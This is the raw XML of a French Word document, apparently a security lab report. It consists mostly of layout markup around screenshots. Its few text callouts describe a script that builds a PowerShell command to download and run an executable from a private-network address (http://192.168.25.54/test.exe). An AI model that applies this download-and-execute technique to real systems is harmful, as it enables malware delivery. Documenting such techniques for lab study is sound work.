    <w:p w14:paraId="47A7A5B1" w14:textId="56241DE6" w:rsidR="00081F5D" w:rsidRDefault="002142C8" w:rsidP="001A2F01">
      <w:pPr>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251662336" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="16702776" wp14:editId="23584106">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3050414</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1081836</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="146304" cy="59055"/>
                <wp:effectExtent l="0" t="38100" r="63500" b="36195"/>
                <wp:wrapNone/>
                <wp:docPr id="22" name="Connecteur droit avec flèche 22"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvCnPr/>
                      <wps:spPr>
                        <a:xfrm flipV="1">
                          <a:off x="0" y="0"/>
                          <a:ext cx="146304" cy="590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DE36AF" id="_x0000_t32" coordsize="21600,21600" o:spt="32" o:oned="t" path="m,l21600,21600e" filled="f">
                <v:path arrowok="t" fillok="f" o:connecttype="none"/>
                <o:lock v:ext="edit" shapetype="t"/>
              </v:shapetype>
              <v:shape id="Connecteur droit avec flèche 22" o:spid="_x0000_s1026" type="#_x0000_t32" style="position:absolute;margin-left:240.2pt;margin-top:85.2pt;width:11.5pt;height:4.6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" strokecolor="#ed7d31 [3205]" strokeweight=".5pt">
                <v:stroke endarrow="block" joinstyle="miter"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251661312" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1F90BE3E" wp14:editId="5535567B">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2954731</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>598068</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2727960" cy="483769"/>
                <wp:effectExtent l="0" t="0" r="15240" b="12065"/>
                <wp:wrapNone/>
                <wp:docPr id="21" name="Zone de texte 21"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="2727960" cy="48376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69B1CA" w14:textId="3C70B702" w:rsidR="002142C8" w:rsidRDefault="002142C8" w:rsidP="002142C8">
                            <w:r>
                              <w:t xml:space="preserve">Le script génère une string forme pour l’exécuter et télécharger dans </w:t>
                            </w:r>
                            <w:r w:rsidRPr="00797B0D">
                              <w:rPr>
                                <w:b/>
                                <w:bCs/>
                              </w:rPr>
                              <w:t>PowerShell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0BE3E" id="_x0000_t202" coordsize="21600,21600" o:spt="202" path="m,l,21600r21600,l21600,xe">
                <v:stroke joinstyle="miter"/>
                <v:path gradientshapeok="t" o:connecttype="rect"/>
              </v:shapetype>
              <v:shape id="Zone de texte 21" o:spid="_x0000_s1026" type="#_x0000_t202" style="position:absolute;margin-left:232.65pt;margin-top:47.1pt;width:214.8pt;height:3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" fillcolor="white [3201]" strokecolor="#ed7d31 [3205]" strokeweight="1pt">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="6769B1CA" w14:textId="3C70B702" w:rsidR="002142C8" w:rsidRDefault="002142C8" w:rsidP="002142C8">
                      <w:r>
                        <w:t xml:space="preserve">Le script génère une string forme pour l’exécuter et télécharger dans </w:t>
                      </w:r>
                      <w:r w:rsidRPr="00797B0D">
                        <w:rPr>
                          <w:b/>
                          <w:bCs/>
                        </w:rPr>
                        <w:t>PowerShell</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00081F5D">
        <w:rPr>
          <w:noProof/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4DA06F43" wp14:editId="786F22C9">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3284499</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2573706</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2355495" cy="460857"/>
                <wp:effectExtent l="0" t="0" r="26035" b="15875"/>
                <wp:wrapNone/>
                <wp:docPr id="19" name="Zone de texte 19"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="2355495" cy="46085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1C65160" w14:textId="62892F0B" w:rsidR="00081F5D" w:rsidRDefault="00081F5D">
                            <w:r>
                              <w:t xml:space="preserve">Récupérer </w:t>
                            </w:r>
                            <w:r w:rsidRPr="00081F5D">
                              <w:rPr>
                                <w:rStyle w:val="y2iqfc"/>
                                <w:rFonts w:cstheme="minorHAnsi"/>
                                <w:b/>
                                <w:bCs/>
                              </w:rPr>
                              <w:t>URL</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:rStyle w:val="y2iqfc"/>
                                <w:rFonts w:cstheme="minorHAnsi"/>
                                <w:b/>
                                <w:bCs/>
                              </w:rPr>
                              <w:t>(http://192.168.25.54/test.exe)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06F43" id="Zone de texte 19" o:spid="_x0000_s1027" type="#_x0000_t202" style="position:absolute;margin-left:258.6pt;margin-top:202.65pt;width:185.45pt;height:3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" fillcolor="white [3201]" strokecolor="#ed7d31 [3205]" strokeweight="1pt">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="71C65160" w14:textId="62892F0B" w:rsidR="00081F5D" w:rsidRDefault="00081F5D">
                      <w:r>
                        <w:t xml:space="preserve">Récupérer </w:t>
                      </w:r>
                      <w:r w:rsidRPr="00081F5D">
                        <w:rPr>
                          <w:rStyle w:val="y2iqfc"/>
                          <w:rFonts w:cstheme="minorHAnsi"/>
                          <w:b/>
                          <w:bCs/>
                        </w:rPr>
                        <w:t>URL</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:rStyle w:val="y2iqfc"/>
                          <w:rFonts w:cstheme="minorHAnsi"/>
                          <w:b/>
                          <w:bCs/>
                        </w:rPr>
                        <w:t>(http://192.168.25.54/test.exe)</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00081F5D">
        <w:rPr>
          <w:noProof/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251660288" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6468A1EC" wp14:editId="7BAE98F5">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2735859</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2310359</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="548640" cy="263347"/>
                <wp:effectExtent l="0" t="0" r="80010" b="60960"/>
                <wp:wrapNone/>
                <wp:docPr id="20" name="Connecteur droit avec flèche 20"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvCnPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="548640" cy="2633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4D3FAE" id="Connecteur droit avec flèche 20" o:spid="_x0000_s1026" type="#_x0000_t32" style="position:absolute;margin-left:215.4pt;margin-top:181.9pt;width:43.2pt;height:20.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" strokecolor="#ed7d31 [3205]" strokeweight=".5pt">
                <v:stroke endarrow="block" joinstyle="miter"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00081F5D">
        <w:rPr>
          <w:noProof/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="76B2E9E1" wp14:editId="110A0895">
            <wp:extent cx="5760720" cy="31248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inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="429BED33" w14:textId="60FCCE63" w:rsidR="00797B0D" w:rsidRDefault="00797B0D" w:rsidP="001A2F01">
      <w:pPr>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5EE90A77" wp14:editId="6E4ED2E0">
            <wp:extent cx="5760720" cy="7054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a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5760720" cy="705485"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D86A546" w14:textId="0BCE1258" w:rsidR="00797B0D" w:rsidRDefault="00797B0D" w:rsidP="001A2F01">
      <w:pPr>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251663360" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7BA26BA5" wp14:editId="2D838D27">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>469671</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>701346</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1958950" cy="2678760"/>
                <wp:effectExtent l="38100" t="38100" r="60960" b="64770"/>
                <wp:wrapNone/>
                <wp:docPr id="27" name="Connecteur droit avec flèche 27"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvCnPr/>
                      <wps:spPr>
                        <a:xfrm flipH="1">
                          <a:off x="0" y="0"/>
                          <a:ext cx="1958950" cy="26787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AF66E" id="Connecteur droit avec flèche 27" o:spid="_x0000_s1026" type="#_x0000_t32" style="position:absolute;margin-left:37pt;margin-top:55.2pt;width:154.25pt;height:210.9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" strokecolor="black [3200]" strokeweight=".5pt">
                <v:stroke startarrow="block" endarrow="block" joinstyle="miter"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1C545DCA" wp14:editId="14012CC1">
            <wp:extent cx="5760720" cy="3463925"/>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463925"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="151FC0C2" w14:textId="62F226EE" w:rsidR="002142C8" w:rsidRDefault="00797B0D" w:rsidP="001A2F01">
      <w:pPr>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7ECC7177" wp14:editId="244B47D9">
            <wp:extent cx="5760720" cy="39370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a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5760720" cy="3937000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EC95904" w14:textId="77777777" w:rsidR="00C40B2C" w:rsidRPr="00D30D4D" w:rsidRDefault="00C40B2C" w:rsidP="001A2F01">
      <w:pPr>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00C40B2C" w:rsidRPr="00D30D4D" w:rsidSect="00E702E9">
      <w:pgSz w:w="11906" w:h="16838"/>
      <w:pgMar w:top="1417" w:right="1417" w:bottom="1417" w:left="1417" w:header="708" w:footer="708" w:gutter="0"/>
      <w:pgBorders w:offsetFrom="page">
        <w:top w:val="basicWhiteSquares" w:sz="9" w:space="24" w:color="auto"/>
        <w:left w:val="basicWhiteSquares" w:sz="9" w:space="24" w:color="auto"/>
        <w:bottom w:val="basicWhiteSquares" w:sz="9" w:space="24" w:color="auto"/>
        <w:right w:val="basicWhiteSquares" w:sz="9"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5E2"/>
    <w:rsid w:val="00061923"/>
    <w:rsid w:val="00081F5D"/>
    <w:rsid w:val="000B720B"/>
    <w:rsid w:val="000C7134"/>
    <w:rsid w:val="00183568"/>
    <w:rsid w:val="001A2F01"/>
    <w:rsid w:val="001B0737"/>
    <w:rsid w:val="002142C8"/>
    <w:rsid w:val="00311264"/>
    <w:rsid w:val="00332786"/>
    <w:rsid w:val="00355B4C"/>
    <w:rsid w:val="004175C3"/>
    <w:rsid w:val="00495E55"/>
    <w:rsid w:val="004A3B3E"/>
    <w:rsid w:val="00503A37"/>
    <w:rsid w:val="00596A4A"/>
    <w:rsid w:val="00725D86"/>
    <w:rsid w:val="00767502"/>
    <w:rsid w:val="00797B0D"/>
    <w:rsid w:val="00832839"/>
    <w:rsid w:val="008666A9"/>
    <w:rsid w:val="0097404A"/>
    <w:rsid w:val="00A8771E"/>
    <w:rsid w:val="00B20C2E"/>
    <w:rsid w:val="00B707AB"/>
    <w:rsid w:val="00BC25E2"/>
    <w:rsid w:val="00C169D1"/>
    <w:rsid w:val="00C40B2C"/>
    <w:rsid w:val="00CB5035"/>
    <w:rsid w:val="00CC5301"/>
    <w:rsid w:val="00D30D4D"/>
    <w:rsid w:val="00D35232"/>
    <w:rsid w:val="00DC0E7D"/>
    <w:rsid w:val="00DC1FDB"/>
    <w:rsid w:val="00E21A61"/>
    <w:rsid w:val="00E702E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14055"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{07848AC8-82F2-4CB6-BC6C-1D998C016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707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07AB"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:spacing w:val="-10"/>
      <w:kern w:val="28"/>
      <w:sz w:val="56"/>
      <w:szCs w:val="56"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hgkelc">
    <w:name w:val="hgkelc"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:rsid w:val="00A8771E"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="PrformatHTML">
    <w:name w:val="HTML Preformatted"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="PrformatHTMLCar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00D30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0D4D"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:eastAsia="fr-FR"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="y2iqfc">
    <w:name w:val="y2iqfc"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:rsid w:val="00D30D4D"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Corpsdetexte">
    <w:name w:val="Body Text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="CorpsdetexteCar"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="000B720B"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:autoSpaceDE w:val="0"/>
      <w:autoSpaceDN w:val="0"/>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="CorpsdetexteCar">
    <w:name w:val="Corps de texte Car"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:link w:val="Corpsdetexte"/>
    <w:uiPriority w:val="1"/>
    <w:rsid w:val="000B720B"/>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816633">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="828403642">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="128773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92313-4136-4BA4-B549-933A2BD69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9</Pages>
  <Words>748</Words>
  <Characters>4118</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iliass lahtani</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>iliass lahtani</cp:lastModifiedBy>
  <cp:revision>15</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-01-30T13:22:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-01-31T12:16:00Z</dcterms:modified>
</cp:coreProperties>
</file>